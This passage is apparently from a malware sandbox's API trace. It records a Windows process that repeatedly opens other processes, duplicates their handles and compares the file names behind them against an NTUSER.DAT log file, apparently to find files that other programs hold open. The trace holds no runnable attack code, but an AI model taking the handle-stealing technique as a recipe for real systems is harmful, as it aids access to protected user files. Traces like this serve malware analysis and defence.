CloseHandle (hObject=0x680) returned 1 [0152.906] CloseHandle (hObject=0x62c) returned 1 [0152.906] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.906] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.907] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.908] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.908] CloseHandle (hObject=0x670) returned 1 [0152.908] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.908] CloseHandle (hObject=0x680) returned 1 [0152.908] CloseHandle (hObject=0x62c) returned 1 [0152.908] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.908] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.909] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.909] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.909] CloseHandle (hObject=0x670) returned 1 [0152.909] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.909] CloseHandle (hObject=0x680) returned 1 [0152.909] CloseHandle (hObject=0x62c) returned 1 [0152.909] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.910] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.910] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.911] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.911] CloseHandle (hObject=0x670) returned 1 [0152.911] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.911] CloseHandle (hObject=0x680) returned 1 [0152.911] CloseHandle (hObject=0x62c) returned 1 [0152.911] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x62c [0152.911] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.911] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.912] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.912] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.913] CloseHandle (hObject=0x670) returned 1 [0152.913] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.913] CloseHandle (hObject=0x680) returned 1 [0152.913] CloseHandle (hObject=0x62c) returned 1 [0152.913] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.913] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.913] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.914] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.914] CloseHandle (hObject=0x670) returned 1 [0152.914] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.914] CloseHandle (hObject=0x680) returned 1 [0152.914] CloseHandle (hObject=0x62c) returned 1 [0152.914] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.914] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.915] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.916] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.916] CloseHandle (hObject=0x670) returned 1 [0152.916] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.916] CloseHandle (hObject=0x680) returned 1 [0152.916] CloseHandle (hObject=0x62c) returned 1 [0152.916] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.916] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.917] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.918] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.918] CloseHandle (hObject=0x670) returned 1 [0152.918] CloseHandle (hObject=0x680) returned 1 [0152.918] CloseHandle (hObject=0x62c) returned 1 [0152.918] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.918] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.919] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.919] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.919] CloseHandle (hObject=0x670) returned 1 [0152.919] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.919] CloseHandle (hObject=0x680) returned 1 [0152.920] CloseHandle (hObject=0x62c) returned 1 [0152.920] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.920] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.920] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.921] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.921] CloseHandle (hObject=0x670) returned 1 [0152.921] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.921] CloseHandle (hObject=0x680) returned 1 [0152.921] CloseHandle (hObject=0x62c) returned 1 [0152.921] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.921] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.922] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.923] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.923] CloseHandle (hObject=0x670) returned 1 [0152.923] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.923] CloseHandle (hObject=0x680) returned 1 [0152.923] CloseHandle (hObject=0x62c) returned 1 [0152.923] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.923] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.924] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.925] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.925] CloseHandle (hObject=0x670) returned 1 [0152.925] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.925] CloseHandle (hObject=0x680) returned 1 [0152.925] CloseHandle (hObject=0x62c) returned 1 [0152.925] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.925] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.925] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.926] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.927] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.927] CloseHandle (hObject=0x670) returned 1 [0152.927] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.927] CloseHandle (hObject=0x680) returned 1 [0152.927] CloseHandle (hObject=0x62c) returned 1 [0152.927] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.927] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.927] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.928] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.929] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.929] CloseHandle (hObject=0x670) returned 1 [0152.929] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.929] CloseHandle (hObject=0x680) returned 1 [0152.929] CloseHandle (hObject=0x62c) returned 1 [0152.929] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.929] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.930] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.931] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.931] CloseHandle (hObject=0x670) returned 1 [0152.931] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.931] CloseHandle (hObject=0x680) returned 1 [0152.931] CloseHandle (hObject=0x62c) returned 1 [0152.931] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.931] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.932] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.932] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.933] CloseHandle (hObject=0x670) returned 1 [0152.933] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.933] CloseHandle (hObject=0x680) returned 1 [0152.933] CloseHandle (hObject=0x62c) returned 1 [0152.933] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.933] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.933] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.934] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.934] CloseHandle (hObject=0x670) returned 1 [0152.934] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.934] CloseHandle (hObject=0x680) returned 1 [0152.934] CloseHandle (hObject=0x62c) returned 1 [0152.934] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.934] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.935] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.936] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.936] CloseHandle (hObject=0x670) returned 1 [0152.936] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.936] CloseHandle (hObject=0x680) returned 1 [0152.936] CloseHandle (hObject=0x62c) returned 1 [0152.936] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.937] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.937] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.938] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.938] CloseHandle (hObject=0x670) returned 1 [0152.938] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.938] CloseHandle (hObject=0x680) returned 1 [0152.938] CloseHandle (hObject=0x62c) returned 1 [0152.938] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.938] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.938] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.939] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.939] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.940] CloseHandle (hObject=0x670) returned 1 [0152.940] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.940] CloseHandle (hObject=0x680) returned 1 [0152.940] CloseHandle (hObject=0x62c) returned 1 [0152.940] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.940] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.941] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.941] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.941] CloseHandle (hObject=0x670) returned 1 [0152.941] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.941] CloseHandle (hObject=0x680) returned 1 [0152.942] CloseHandle (hObject=0x62c) returned 1 [0152.942] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.942] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.942] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.943] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.943] CloseHandle (hObject=0x670) returned 1 [0152.943] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.943] CloseHandle (hObject=0x680) returned 1 [0152.943] CloseHandle (hObject=0x62c) returned 1 [0152.943] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.943] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.944] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.945] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.945] CloseHandle (hObject=0x670) returned 1 [0152.945] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.945] CloseHandle (hObject=0x680) returned 1 [0152.945] CloseHandle (hObject=0x62c) returned 1 [0152.945] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.945] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.946] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.946] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.947] CloseHandle (hObject=0x670) returned 1 [0152.947] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0152.947] CloseHandle (hObject=0x680) returned 1 [0152.947] CloseHandle (hObject=0x62c) returned 1 [0152.947] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.947] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.948] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.949] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.949] CloseHandle (hObject=0x670) returned 1 [0152.949] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.949] CloseHandle (hObject=0x680) returned 1 [0152.949] CloseHandle (hObject=0x62c) returned 1 [0152.949] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.949] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.950] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 